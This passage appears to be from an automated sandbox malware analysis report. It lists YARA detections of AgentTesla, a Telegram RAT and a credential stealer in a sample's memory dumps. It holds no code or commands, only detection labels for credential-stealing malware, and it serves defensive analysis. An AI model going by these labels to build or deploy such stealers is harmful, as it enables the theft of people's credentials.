                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >